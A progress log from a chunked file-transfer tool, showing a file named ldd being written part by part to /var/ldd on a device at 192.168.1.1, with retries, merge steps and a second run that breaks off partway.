31.0% 148.1 Bps part 65 (48 B; cmd: 235 ch) 192.168.1.1: OK
31.5% 144.6 Bps part 66 (48 B; cmd: 235 ch) 192.168.1.1: OK
32.0% 141.2 Bps part 67 (48 B; cmd: 235 ch) 192.168.1.1: OK
32.5% 142.9 Bps part 68 (48 B; cmd: 235 ch) 192.168.1.1: OK
32.9% 151.4 Bps part 69 (48 B; cmd: 235 ch) 192.168.1.1: OK
33.4% 143.7 Bps part 70 (48 B; cmd: 235 ch) 192.168.1.1: OK
33.9% 146.8 Bps part 71 (48 B; cmd: 235 ch) 192.168.1.1: OK
34.4% 183.9 Bps part 72 (48 B; cmd: 235 ch) 192.168.1.1: OK
34.8% 144.1 Bps part 73 (48 B; cmd: 235 ch) 192.168.1.1: OK
35.3% 117.1 Bps part 74 (48 B; cmd: 235 ch) 192.168.1.1: OK
35.8% 144.6 Bps part 75 (48 B; cmd: 235 ch) 192.168.1.1: OK
36.3% 144.6 Bps part 76 (48 B; cmd: 235 ch) 192.168.1.1: OK
36.7% 151.4 Bps part 77 (48 B; cmd: 235 ch) 192.168.1.1: OK
37.2% 172.0 Bps part 78 (48 B; cmd: 235 ch) 192.168.1.1: OK
37.7% 119.7 Bps part 79 (48 B; cmd: 235 ch) 192.168.1.1: OK
38.2% 143.7 Bps part 80 (48 B; cmd: 235 ch) 192.168.1.1: OK
38.6% 151.9 Bps part 81 (48 B; cmd: 235 ch) 192.168.1.1: OK
39.1% 143.7 Bps part 82 (48 B; cmd: 235 ch) 192.168.1.1: OK
39.6% 146.8 Bps part 83 (48 B; cmd: 235 ch) 192.168.1.1: OK
40.1% 183.9 Bps part 84 (48 B; cmd: 235 ch) 192.168.1.1: OK
40.5% 117.1 Bps part 85 (48 B; cmd: 235 ch) 192.168.1.1: OK
41.0% 142.9 Bps part 86 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
41.5% 147.2 Bps part 87 (48 B; cmd: 235 ch) 192.168.1.1: OK
42.0% 179.1 Bps part 88 (48 B; cmd: 235 ch) 192.168.1.1: OK
42.5% 145.5 Bps part 89 (48 B; cmd: 235 ch) 192.168.1.1: OK
42.9% 136.8 Bps part 90 (48 B; cmd: 235 ch) 192.168.1.1: OK
43.4% 120.0 Bps part 91 (48 B; cmd: 235 ch) 192.168.1.1: OK
43.9% 151.9 Bps part 92 (48 B; cmd: 235 ch) 192.168.1.1: OK
44.4% 143.3 Bps part 93 (48 B; cmd: 235 ch) 192.168.1.1: OK
44.8% 146.3 Bps part 94 (48 B; cmd: 235 ch) 192.168.1.1: OK
45.3% 145.9 Bps part 95 (48 B; cmd: 235 ch) 192.168.1.1: OK
45.8% 138.7 Bps part 96 (48 B; cmd: 235 ch) 192.168.1.1: OK
46.3% 151.4 Bps part 97 (48 B; cmd: 235 ch) ש LOST
46.3% 31.8 Bps part 97 (48 B; cmd: 235 ch) 192.168.1.1: OK
46.7% 436.4 Bps part 98 (48 B; cmd: 235 ch) 192.168.1.1: OK
47.2% 138.7 Bps part 99 (48 B; cmd: 235 ch) LOST
47.2% 32.0 Bps part 99 (48 B; cmd: 235 ch) 192.168.1.1: OK
47.7% 378.0 Bps part 100 (48 B; cmd: 237 ch) 192.168.1.1: OK
Merging to / var / ldd parts 1..16 (16 pcs; cmd: 228 ch) ... OK (777 B)
Merging to / var / ldd parts 17..32 (16 pcs; cmd: 238 ch) ... OK (1545 B)
Merging to / var / ldd parts 33..48 (16 pcs; cmd: 238 ch) ... OK (2313 B)
Merging to / var / ldd parts 49..64 (16 pcs; cmd: 238 ch) ... OK (3081 B)
Merging to / var / ldd parts 65..80 (16 pcs; cmd: 238 ch) ... OK (3849 B)
Merging to / var / ldd parts 81..96 (16 pcs; cmd: 238 ch) ... OK (4617 B)
Merging to / var / ldd parts 97..100 (4 pcs; cmd: 71 ch) ... OK (4809 B)
Written 4.70KB / 9.85KB 77.0 Bps (avg) Remaining: 01:08 (01: 02/02: 10)
48.2% 5.2 Bps part 101 (49 B; cmd: 237 ch) 192.168.1.1: OK
48.7% 116.7 Bps part 102 (49 B; cmd: 237 ch) 192.168.1.1: OK
49.1% 196.8 Bps part 103 (49 B; cmd: 237 ch) LOST
49.1% 32.7 Bps part 103 (49 B; cmd: 237 ch) 192.168.1.1: OK
49.6% 418.8 Bps part 104 (49 B; cmd: 237 ch) 192.168.1.1: OK
50.1% 138.8 Bps part 105 (49 B; cmd: 237 ch) 192.168.1.1: OK
50.6% 150.8 Bps part 106 (49 B; cmd: 237 ch) 192.168.1.1: OK
51.1% 153.6 Bps part 107 (49 B; cmd: 237 ch) 192.168.1.1: OK
51.6% 151.7 Bps part 108 (49 B; cmd: 237 ch) 192.168.1.1: OK
52.1% 142.4 Bps part 109 (49 B; cmd: 237 ch) 192.168.1.1: OK
52.5% 145.5 Bps part 110 (48 B; cmd: 235 ch) 192.168.1.1: OK
53.0% 150.9 Bps part 111 (48 B; cmd: 235 ch) ש LOST
53.0% 31.7 Bps part 111 (48 B; cmd: 235 ch) 192.168.1.1: OK
53.5% 410.3 Bps part 112 (48 B; cmd: 235 ch) 192.168.1.1: OK
54.0% 143.3 Bps part 113 (48 B; cmd: 235 ch) 192.168.1.1: OK
54.4% 144.6 Bps part 114 (48 B; cmd: 235 ch) 192.168.1.1: OK
54.9% 141.6 Bps part 115 (48 B; cmd: 235 ch) 192.168.1.1: OK
55.4% 150.0 Bps part 116 (48 B; cmd: 235 ch) 192.168.1.1: OK
55.9% 140.4 Bps part 117 (48 B; cmd: 235 ch) 192.168.1.1: OK
56.3% 151.9 Bps part 118 (48 B; cmd: 235 ch) 192.168.1.1: OK
56.8% 142.0 Bps part 119 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
57.3% 145.5 Bps part 120 (48 B; cmd: 235 ch) 192.168.1.1: OK
57.8% 140.8 Bps part 121 (48 B; cmd: 235 ch) 192.168.1.1: OK
58.3% 154.3 Bps part 122 (48 B; cmd: 235 ch) 192.168.1.1: OK
58.7% 144.6 Bps part 123 (48 B; cmd: 235 ch) 192.168.1.1: OK
59.2% 141.2 Bps part 124 (48 B; cmd: 235 ch) 192.168.1.1: OK
59.7% 138.7 Bps part 125 (48 B; cmd: 235 ch) 192.168.1.1: OK
60.2% 151.9 Bps part 126 (48 B; cmd: 235 ch) 192.168.1.1: OK
60.6% 142.9 Bps part 127 (48 B; cmd: 235 ch) ש LOST
60.6% 31.9 Bps part 127 (48 B; cmd: 235 ch) 192.168.1.1: OK
61.1% 378.0 Bps part 128 (48 B; cmd: 235 ch) 192.168.1.1: OK
61.6% 142.4 Bps part 129 (48 B; cmd: 235 ch) 192.168.1.1: OK
62.1% 150.0 Bps part 130 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
62.5% 136.8 Bps part 131 (48 B; cmd: 235 ch) 192.168.1.1: OK
63.0% 154.3 Bps part 132 (48 B; cmd: 235 ch) 192.168.1.1: OK
63.5% 149.1 Bps part 133 (48 B; cmd: 235 ch) 192.168.1.1: OK
64.0% 145.9 Bps part 134 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
64.4% 142.4 Bps part 135 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
64.9% 147.7 Bps part 136 (48 B; cmd: 235 ch) 192.168.1.1: OK
65.4% 146.8 Bps part 137 (48 B; cmd: 235 ch) 192.168.1.1: OK
65.9% 142.0 Bps part 138 (48 B; cmd: 235 ch) 192.168.1.1: OK
66.3% 179.8 Bps part 139 (48 B; cmd: 235 ch) 192.168.1.1: OK
66.8% 121.2 Bps part 140 (48 B; cmd: 235 ch) 192.168.1.1: OK
67.3% 182.5 Bps part 141 (48 B; cmd: 235 ch) 192.168.1.1: OK
67.8% 119.4 Bps part 142 (48 B; cmd: 235 ch) 192.168.1.1: OK
68.2% 146.3 Bps part 143 (48 B; cmd: 235 ch) 192.168.1.1: OK
68.7% 145.0 Bps part 144 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
69.2% 142.4 Bps part 145 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
69.7% 142.9 Bps part 146 (48 B; cmd: 235 ch) 192.168.1.1: OK
70.2% 145.0 Bps part 147 (48 B; cmd: 235 ch) 192.168.1.1: OK
70.6% 142.0 Bps part 148 (48 B; cmd: 235 ch) 192.168.1.1: OK
71.1% 152.9 Bps part 149 (48 B; cmd: 235 ch) 192.168.1.1: OK
71.6% 177.1 Bps part 150 (48 B; cmd: 235 ch) 192.168.1.1: OK
72.1% 122.8 Bps part 151 (48 B; cmd: 235 ch) 192.168.1.1: OK
72.5% 143.3 Bps part 152 (48 B; cmd: 235 ch) 192.168.1.1: OK
73.0% 145.9 Bps part 153 (48 B; cmd: 235 ch) ש LOST
73.0% 31.7 Bps part 153 (48 B; cmd: 235 ch) 192.168.1.1: OK
73.5% 432.4 Bps part 154 (48 B; cmd: 235 ch) 192.168.1.1: OK
74.0% 144.6 Bps part 155 (48 B; cmd: 235 ch) 192.168.1.1: OK
74.4% 145.5 Bps part 156 (48 B; cmd: 235 ch) 192.168.1.1: OK
74.9% 182.5 Bps part 157 (48 B; cmd: 235 ch) 192.168.1.1: OK
75.4% 117.1 Bps part 158 (48 B; cmd: 235 ch) 192.168.1.1: OK
75.9% 148.6 Bps part 159 (48 B; cmd: 235 ch) 192.168.1.1: OK
76.3% 183.9 Bps part 160 (48 B; cmd: 235 ch) 192.168.1.1: OK
76.8% 140.4 Bps part 161 (48 B; cmd: 235 ch) 192.168.1.1: OK
77.3% 121.2 Bps part 162 (48 B; cmd: 235 ch) 192.168.1.1: OK
77.8% 149.1 Bps part 163 (48 B; cmd: 235 ch) שש192.168.1.1: OK
78.2% 141.6 Bps part 164 (48 B; cmd: 235 ch) ש192.168.1.1: OK
78.7% 145.0 Bps part 165 (48 B; cmd: 235 ch) ש192.168.1.1: OK
79.2% 148.1 Bps part 166 (48 B; cmd: 235 ch) ש192.168.1.1: OK
79.7% 176.5 Bps part 167 (48 B; cmd: 235 ch) 192.168.1.1: OK
80.1% 121.5 Bps part 168 (48 B; cmd: 235 ch) שש192.168.1.1: OK
80.6% 145.5 Bps part 169 (48 B; cmd: 235 ch) שש192.168.1.1: OK
81.1% 144.6 Bps part 170 (48 B; cmd: 235 ch) ששLOST
81.1% 31.7 Bps part 170 (48 B; cmd: 235 ch) 192.168.1.1: OK
81.6% 417.4 Bps part 171 (48 B; cmd: 235 ch) שש192.168.1.1: OK
82.1% 144.6 Bps part 172 (48 B; cmd: 235 ch) שש192.168.1.1: OK
82.5% 182.5 Bps part 173 (48 B; cmd: 235 ch) 192.168.1.1: OK
83.0% 119.4 Bps part 174 (48 B; cmd: 235 ch) ש192.168.1.1: OK
83.5% 139.5 Bps part 175 (48 B; cmd: 235 ch) 192.168.1.1: OK
84.0% 145.9 Bps part 176 (48 B; cmd: 235 ch) 192.168.1.1: OK
84.4% 145.9 Bps part 177 (48 B; cmd: 235 ch) 192.168.1.1: OK
84.9% 142.0 Bps part 178 (48 B; cmd: 235 ch) 192.168.1.1: OK
85.4% 150.5 Bps part 179 (48 B; cmd: 235 ch) ש192.168.1.1: OK
85.9% 150.0 Bps part 180 (48 B; cmd: 235 ch) ש192.168.1.1: OK
86.3% 142.0 Bps part 181 (48 B; cmd: 235 ch) ש192.168.1.1: OK
86.8% 143.7 Bps part 182 (48 B; cmd: 235 ch) שש192.168.1.1: OK
87.3% 147.7 Bps part 183 (48 B; cmd: 235 ch) ש192.168.1.1: OK
87.8% 141.6 Bps part 184 (48 B; cmd: 235 ch) LOST
87.8% 32.0 Bps part 184 (48 B; cmd: 235 ch) 192.168.1.1: OK
88.2% 355.6 Bps part 185 (48 B; cmd: 235 ch) ש192.168.1.1: OK
88.7% 149.1 Bps part 186 (48 B; cmd: 235 ch) שש192.168.1.1: OK
89.2% 140.4 Bps part 187 (48 B; cmd: 235 ch) ש192.168.1.1: OK
89.7% 147.2 Bps part 188 (48 B; cmd: 235 ch) ש192.168.1.1: OK
90.1% 148.1 Bps part 189 (48 B; cmd: 235 ch) ש192.168.1.1: OK
90.6% 144.1 Bps part 190 (48 B; cmd: 235 ch) LOST
90.6% 32.0 Bps part 190 (48 B; cmd: 235 ch) 192.168.1.1: OK
91.1% 406.8 Bps part 191 (48 B; cmd: 235 ch) 192.168.1.1: OK
91.6% 142.9 Bps part 192 (48 B; cmd: 235 ch) 192.168.1.1: OK
92.0% 148.1 Bps part 193 (48 B; cmd: 235 ch) ש192.168.1.1: OK
92.5% 144.6 Bps part 194 (48 B; cmd: 235 ch) ש192.168.1.1: OK
93.0% 147.2 Bps part 195 (48 B; cmd: 235 ch) ש192.168.1.1: OK
93.5% 144.1 Bps part 196 (48 B; cmd: 235 ch) ש192.168.1.1: OK
94.0% 147.7 Bps part 197 (48 B; cmd: 235 ch) שש192.168.1.1: OK
94.4% 145.9 Bps part 198 (48 B; cmd: 235 ch) שש192.168.1.1: OK
94.9% 174.5 Bps part 199 (48 B; cmd: 235 ch) 192.168.1.1: OK
95.4% 123.4 Bps part 200 (48 B; cmd: 237 ch) 192.168.1.1: OK
Merging to /var/ldd parts 101..116 (16 pcs; cmd: 229 ch)… OK (5586 B)
Merging to /var/ldd parts 117..132 (16 pcs; cmd: 238 ch)… OK (6354 B)
Merging to /var/ldd parts 133..148 (16 pcs; cmd: 238 ch)… OK (7122 B)
Merging to /var/ldd parts 149..164 (16 pcs; cmd: 238 ch)… OK (7890 B)
Merging to /var/ldd parts 165..180 (16 pcs; cmd: 238 ch)… OK (8658 B)
Merging to /var/ldd parts 181..196 (16 pcs; cmd: 238 ch)… OK (9426 B)
Merging to /var/ldd parts 197..200 (4 pcs; cmd: 71 ch)… OK (9618 B)
Written 9.39KB/9.85KB 92.9 Bps (avg) Remaining: 00:05 (01:54/01:59)
95.9% 4.9 Bps part 201 (49 B; cmd: 237 ch) 192.168.1.1: OK
96.4% 146.7 Bps part 202 (49 B; cmd: 237 ch) 192.168.1.1: OK
96.8% 155.6 Bps part 203 (49 B; cmd: 237 ch) שש192.168.1.1: OK
97.3% 142.9 Bps part 204 (49 B; cmd: 237 ch) 192.168.1.1: OK
97.8% 153.1 Bps part 205 (49 B; cmd: 237 ch) LOST
97.8% 32.7 Bps part 205 (49 B; cmd: 237 ch) 192.168.1.1: OK
98.3% 388.9 Bps part 206 (49 B; cmd: 237 ch) ש192.168.1.1: OK
98.8% 148.5 Bps part 207 (49 B; cmd: 237 ch) 192.168.1.1: OK
99.3% 144.5 Bps part 208 (49 B; cmd: 237 ch) 192.168.1.1: OK
99.8% 151.2 Bps part 209 (49 B; cmd: 237 ch) ש192.168.1.1: OK
100.0% 75.3 Bps part 210 (25 B; cmd: 143 ch) שש192.168.1.1: OK
Merging to /var/ldd parts 201..210 (10 pcs; cmd: 145 ch)… OK (10084 B)
Written 9.85KB/9.85KB 78.7 Bps (avg) Remaining: 00:00 (02:00/02:00)
Finished. File size on target is 9.85KB. Working time: 02:00 (120 sec)
Source file: 'Useful \ ldd' Target file: '/ var / ldd'
0.5% 742.4 Bps part 1 (49 B; cmd: 237 ch) 192.168.1.1: OK
1.0% 106.5 Bps part 2 (49 B; cmd: 237 ch) LOST
1.0% 32.7 Bps part 2 (49 B; cmd: 237 ch) 192.168.1.1: OK
1.5% 347.5 Bps part 3 (49 B; cmd: 237 ch) 192.168.1.1: OK
1.9% 159.1 Bps part 4 (49 B; cmd: 237 ch) 192.168.1.1: OK
2.4% 150.3 Bps part 5 (49 B; cmd: 237 ch) שש LOST
2.4% 32.2 Bps part 5 (49 B; cmd: 237 ch) 192.168.1.1: OK
2.9% 376.9 Bps part 6 (49 B; cmd: 237 ch) ש LOST
2.9% 32.6 Bps part 6 (49 B; cmd: 237 ch) 192.168.1.1: OK
3.4% 401.6 Bps part 7 (49 B; cmd: 237 ch) ש 192.168.1.1: OK
3.9% 146.3 Bps part 8 (49 B; cmd: 237 ch) 192.168.1.1: OK
4.4% 102.3 Bps part 9 (49 B; cmd: 237 ch) ש 192.168.1.1: OK
4.8% 150.0 Bps part 10 (48 B; cmd: 235 ch) 192.168.1.1: OK
5.3% 176.5 Bps part 11 (48 B; cmd: 235 ch) 192.168.1.1: OK
5.8% 120.9 Bps part 12 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
6.3% 145.5 Bps part 13 (48 B; cmd: 235 ch) 192.168.1.1: OK
6.8% 144.6 Bps part 14 (48 B; cmd: 235 ch) ש LOST
6.8% 31.7 Bps part 14 (48 B; cmd: 235 ch) 192.168.1.1: OK
7.2% 285.7 Bps part 15 (48 B; cmd: 235 ch) 192.168.1.1: OK
7.7% 147.7 Bps part 16 (48 B; cmd: 235 ch) LOST
7.7% 32.0 Bps part 16 (48 B; cmd: 235 ch) 192.168.1.1: OK
8.2% 333.3 Bps part 17 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
8.7% 146.3 Bps part 18 (48 B; cmd: 235 ch) 192.168.1.1: OK
9.1% 148.1 Bps part 19 (48 B; cmd: 235 ch) 192.168.1.1: OK
9.6% 141.6 Bps part 20 (48 B; cmd: 235 ch) 192.168.1.1: OK
10.1% 145.0 Bps part 21 (48 B; cmd: 235 ch) 192.168.1.1: OK
10.6% 145.5 Bps part 22 (48 B; cmd: 235 ch) 192.168.1.1: OK
11.0% 148.1 Bps part 23 (48 B; cmd: 235 ch) 192.168.1.1: OK
11.5% 145.9 Bps part 24 (48 B; cmd: 235 ch) 192.168.1.1: OK
12.0% 137.5 Bps part 25 (48 B; cmd: 235 ch) 192.168.1.1: OK
12.5% 146.3 Bps part 26 (48 B; cmd: 235 ch) 192.168.1.1: OK
12.9% 151.9 Bps part 27 (48 B; cmd: 235 ch) 192.168.1.1: OK
13.4% 172.0 Bps part 28 (48 B; cmd: 235 ch) 192.168.1.1: OK
13.9% 126.0 Bps part 29 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
14.4% 173.3 Bps part 30 (48 B; cmd: 235 ch) ש LOST
14.4% 31.7 Bps part 30 (48 B; cmd: 235 ch) 192.168.1.1: OK
14.8% 358.2 Bps part 31 (48 B; cmd: 235 ch) 192.168.1.1: OK
15.3% 144.6 Bps part 32 (48 B; cmd: 235 ch) 192.168.1.1: OK
15.8% 149.5 Bps part 33 (48 B; cmd: 235 ch) 192.168.1.1: OK
16.3% 137.1 Bps part 34 (48 B; cmd: 235 ch) 192.168.1.1: OK
16.7% 153.8 Bps part 35 (48 B; cmd: 235 ch) 192.168.1.1: OK
17.2% 138.7 Bps part 36 (48 B; cmd: 235 ch) 192.168.1.1: OK
17.7% 145.5 Bps part 37 (48 B; cmd: 235 ch) 192.168.1.1: OK
18.2% 140.4 Bps part 38 (48 B; cmd: 235 ch) 192.168.1.1: OK
18.7% 154.3 Bps part 39 (48 B; cmd: 235 ch) LOST
18.7% 32.0 Bps part 39 (48 B; cmd: 235 ch) LOST
18.7% 32.0 Bps part 39 (48 B; cmd: 235 ch) LOST
18.7% 31.6 Bps part 39 (48 B; cmd: 235 ch) 192.168.1.1: OK
19.1% 428.6 Bps part 40 (48 B; cmd: 235 ch) 192.168.1.1: OK
19.6% 175.2 Bps part 41 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
20.1% 120.6 Bps part 42 (48 B; cmd: 235 ch) 192.168.1.1: OK
20.6% 146.3 Bps part 43 (48 B; cmd: 235 ch) 192.168.1.1: OK
21.0% 150.0 Bps part 44 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
21.5% 145.0 Bps part 45 (48 B; cmd: 235 ch) שש LOST
21.5% 31.0 Bps part 45 (48 B; cmd: 235 ch) 192.168.1.1: OK
22.0% 363.6 Bps part 46 (48 B; cmd: 235 ch) 192.168.1.1: OK
22.5% 137.9 Bps part 47 (48 B; cmd: 235 ch) 192.168.1.1: OK
22.9% 154.3 Bps part 48 (48 B; cmd: 235 ch) 192.168.1.1: OK
23.4% 145.0 Bps part 49 (48 B; cmd: 235 ch) שש LOST
23.4% 31.9 Bps part 49 (48 B; cmd: 235 ch) 192.168.1.1: OK
23.9% 360.9 Bps part 50 (48 B; cmd: 235 ch) שש LOST
23.9% 31.8 Bps part 50 (48 B; cmd: 235 ch) 192.168.1.1: OK
24.4% 345.3 Bps part 51 (48 B; cmd: 235 ch) 192.168.1.1: OK
24.8% 151.4 Bps part 52 (48 B; cmd: 235 ch) ש LOST
24.8% 31.6 Bps part 52 (48 B; cmd: 235 ch) 192.168.1.1: OK
25.3% 342.9 Bps part 53 (48 B; cmd: 235 ch) 192.168.1.1: OK
25.8% 145.0 Bps part 54 (48 B; cmd: 235 ch) 192.168.1.1: OK
26.3% 151.4 Bps part 55 (48 B; cmd: 235 ch) 192.168.1.1: OK
26.7% 145.5 Bps part 56 (48 B; cmd: 235 ch) 192.168.1.1: OK
27.2% 147.7 Bps part 57 (48 B; cmd: 235 ch) 192.168.1.1: OK
27.7% 143.7 Bps part 58 (48 B; cmd: 235 ch) 192.168.1.1: OK
28.2% 142.9 Bps part 59 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
28.6% 142.9 Bps part 60 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
29.1% 149.1 Bps part 61 (48 B; cmd: 235 ch) 192.168.1.1: OK
29.6% 142.4 Bps part 62 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
30.1% 142.9 Bps part 63 (48 B; cmd: 235 ch) 192.168.1.1: OK
30.6% 145.9 Bps part 64 (48 B; cmd: 235 ch) 192.168.1.1: OK
31.0% 148.1 Bps part 65 (48 B; cmd: 235 ch) 192.168.1.1: OK
31.5% 144.6 Bps part 66 (48 B; cmd: 235 ch) 192.168.1.1: OK
32.0% 141.2 Bps part 67 (48 B; cmd: 235 ch) 192.168.1.1: OK
32.5% 142.9 Bps part 68 (48 B; cmd: 235 ch) 192.168.1.1: OK
32.9% 151.4 Bps part 69 (48 B; cmd: 235 ch) 192.168.1.1: OK
33.4% 143.7 Bps part 70 (48 B; cmd: 235 ch) 192.168.1.1: OK
33.9% 146.8 Bps part 71 (48 B; cmd: 235 ch) 192.168.1.1: OK
34.4% 183.9 Bps part 72 (48 B; cmd: 235 ch) 192.168.1.1: OK
34.8% 144.1 Bps part 73 (48 B; cmd: 235 ch) 192.168.1.1: OK
35.3% 117.1 Bps part 74 (48 B; cmd: 235 ch) 192.168.1.1: OK
35.8% 144.6 Bps part 75 (48 B; cmd: 235 ch) 192.168.1.1: OK
36.3% 144.6 Bps part 76 (48 B; cmd: 235 ch) 192.168.1.1: OK
36.7% 151.4 Bps part 77 (48 B; cmd: 235 ch) 192.168.1.1: OK
37.2% 172.0 Bps part 78 (48 B; cmd: 235 ch) 192.168.1.1: OK
37.7% 119.7 Bps part 79 (48 B; cmd: 235 ch) 192.168.1.1: OK
38.2% 143.7 Bps part 80 (48 B; cmd: 235 ch) 192.168.1.1: OK
38.6% 151.9 Bps part 81 (48 B; cmd: 235 ch) 192.168.1.1: OK
39.1% 143.7 Bps part 82 (48 B; cmd: 235 ch) 192.168.1.1: OK
39.6% 146.8 Bps part 83 (48 B; cmd: 235 ch) 192.168.1.1: OK
40.1% 183.9 Bps part 84 (48 B; cmd: 235 ch) 192.168.1.1: OK
40.5% 117.1 Bps part 85 (48 B; cmd: 235 ch) 192.168.1.1: OK
41.0% 142.9 Bps part 86 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
41.5% 147.2 Bps part 87 (48 B; cmd: 235 ch) 192.168.1.1: OK
42.0% 179.1 Bps part 88 (48 B; cmd: 235 ch) 192.168.1.1: OK
42.5% 145.5 Bps part 89 (48 B; cmd: 235 ch) 192.168.1.1: OK
42.9% 136.8 Bps part 90 (48 B; cmd: 235 ch) 192.168.1.1: OK
43.4% 120.0 Bps part 91 (48 B; cmd: 235 ch) 192.168.1.1: OK
43.9% 151.9 Bps part 92 (48 B; cmd: 235 ch) 192.168.1.1: OK
44.4% 143.3 Bps part 93 (48 B; cmd: 235 ch) 192.168.1.1: OK
44.8% 146.3 Bps part 94 (48 B; cmd: 235 ch) 192.168.1.1: OK
45.3% 145.9 Bps part 95 (48 B; cmd: 235 ch) 192.168.1.1: OK
45.8% 138.7 Bps part 96 (48 B; cmd: 235 ch) 192.168.1.1: OK
46.3% 151.4 Bps part 97 (48 B; cmd: 235 ch) ש LOST
46.3% 31.8 Bps part 97 (48 B; cmd: 235 ch) 192.168.1.1: OK
46.7% 436.4 Bps part 98 (48 B; cmd: 235 ch) 192.168.1.1: OK
47.2% 138.7 Bps part 99 (48 B; cmd: 235 ch) LOST
47.2% 32.0 Bps part 99 (48 B; cmd: 235 ch) 192.168.1.1: OK
47.7% 378.0 Bps part 100 (48 B; cmd: 237 ch) 192.168.1.1: OK
Merging to / var / ldd parts 1..16 (16 pcs; cmd: 228 ch) ... OK (777 B)
Merging to / var / ldd parts 17..32 (16 pcs; cmd: 238 ch) ... OK (1545 B)
Merging to / var / ldd parts 33..48 (16 pcs; cmd: 238 ch) ... OK (2313 B)
Merging to / var / ldd parts 49..64 (16 pcs; cmd: 238 ch) ... OK (3081 B)
Merging to / var / ldd parts 65..80 (16 pcs; cmd: 238 ch) ... OK (3849 B)
Merging to / var / ldd parts 81..96 (16 pcs; cmd: 238 ch) ... OK (4617 B)
Merging to / var / ldd parts 97..100 (4 pcs; cmd: 71 ch) ... OK (4809 B)
Written 4.70KB / 9.85KB 77.0 Bps (avg) Remaining: 01:08 (01: 02/02: 10)
48.2% 5.2 Bps part 101 (49 B; cmd: 237 ch) 192.168.1.1: OK
48.7% 116.7 Bps part 102 (49 B; cmd: 237 ch) 192.168.1.1: OK
49.1% 196.8 Bps part 103 (49 B; cmd: 237 ch) LOST
49.1% 32.7 Bps part 103 (49 B; cmd: 237 ch) 192.168.1.1: OK
49.6% 418.8 Bps part 104 (49 B; cmd: 237 ch) 192.168.1.1: OK
50.1% 138.8 Bps part 105 (49 B; cmd: 237 ch) 192.168.1.1: OK
50.6% 150.8 Bps part 106 (49 B; cmd: 237 ch) 192.168.1.1: OK
51.1% 153.6 Bps part 107 (49 B; cmd: 237 ch) 192.168.1.1: OK
51.6% 151.7 Bps part 108 (49 B; cmd: 237 ch) 192.168.1.1: OK
52.1% 142.4 Bps part 109 (49 B; cmd: 237 ch) 192.168.1.1: OK
52.5% 145.5 Bps part 110 (48 B; cmd: 235 ch) 192.168.1.1: OK
53.0% 150.9 Bps part 111 (48 B; cmd: 235 ch) ש LOST
53.0% 31.7 Bps part 111 (48 B; cmd: 235 ch) 192.168.1.1: OK
53.5% 410.3 Bps part 112 (48 B; cmd: 235 ch) 192.168.1.1: OK
54.0% 143.3 Bps part 113 (48 B; cmd: 235 ch) 192.168.1.1: OK
54.4% 144.6 Bps part 114 (48 B; cmd: 235 ch) 192.168.1.1: OK
54.9% 141.6 Bps part 115 (48 B; cmd: 235 ch) 192.168.1.1: OK
55.4% 150.0 Bps part 116 (48 B; cmd: 235 ch) 192.168.1.1: OK
55.9% 140.4 Bps part 117 (48 B; cmd: 235 ch) 192.168.1.1: OK
56.3% 151.9 Bps part 118 (48 B; cmd: 235 ch) 192.168.1.1: OK
56.8% 142.0 Bps part 119 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
57.3% 145.5 Bps part 120 (48 B; cmd: 235 ch) 192.168.1.1: OK
57.8% 140.8 Bps part 121 (48 B; cmd: 235 ch) 192.168.1.1: OK
58.3% 154.3 Bps part 122 (48 B; cmd: 235 ch) 192.168.1.1: OK
58.7% 144.6 Bps part 123 (48 B; cmd: 235 ch) 192.168.1.1: OK
59.2% 141.2 Bps part 124 (48 B; cmd: 235 ch) 192.168.1.1: OK
59.7% 138.7 Bps part 125 (48 B; cmd: 235 ch) 192.168.1.1: OK
60.2% 151.9 Bps part 126 (48 B; cmd: 235 ch) 192.168.1.1: OK
60.6% 142.9 Bps part 127 (48 B; cmd: 235 ch) ש LOST
60.6% 31.9 Bps part 127 (48 B; cmd: 235 ch) 192.168.1.1: OK
61.1% 378.0 Bps part 128 (48 B; cmd: 235 ch) 192.168.1.1: OK
61.6% 142.4 Bps part 129 (48 B; cmd: 235 ch) 192.168.1.1: OK
62.1% 150.0 Bps part 130 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
62.5% 136.8 Bps part 131 (48 B; cmd: 235 ch) 192.168.1.1: OK
63.0% 154.3 Bps part 132 (48 B; cmd: 235 ch) 192.168.1.1: OK
63.5% 149.1 Bps part 133 (48 B; cmd: 235 ch) 192.168.1.1: OK
64.0% 145.9 Bps part 134 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
64.4% 142.4 Bps part 135 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
64.9% 147.7 Bps part 136 (48 B; cmd: 235 ch) 192.168.1.1: OK
65.4% 146.8 Bps part 137 (48 B; cmd: 235 ch) 192.168.1.1: OK
65.9% 142.0 Bps part 138 (48 B; cmd: 235 ch) 192.168.1.1: OK
66.3% 179.8 Bps part 139 (48 B; cmd: 235 ch) 192.168.1.1: OK
66.8% 121.2 Bps part 140 (48 B; cmd: 235 ch) 192.168.1.1: OK
67.3% 182.5 Bps part 141 (48 B; cmd: 235 ch) 192.168.1.1: OK
67.8% 119.4 Bps part 142 (48 B; cmd: 235 ch) 192.168.1.1: OK
68.2% 146.3 Bps part 143 (48 B; cmd: 235 ch) 192.168.1.1: OK
68.7% 145.0 Bps part 144 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
69.2% 142.4 Bps part 145 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
69.7% 142.9 Bps part 146 (48 B; cmd: 235 ch) 192.168.1.1: OK
70.2% 145.0 Bps part 147 (48 B; cmd: 235 ch) 192.168.1.1: OK
70.6% 142.0 Bps part 148 (48 B; cmd: 235 ch) 192.168.1.1: OK
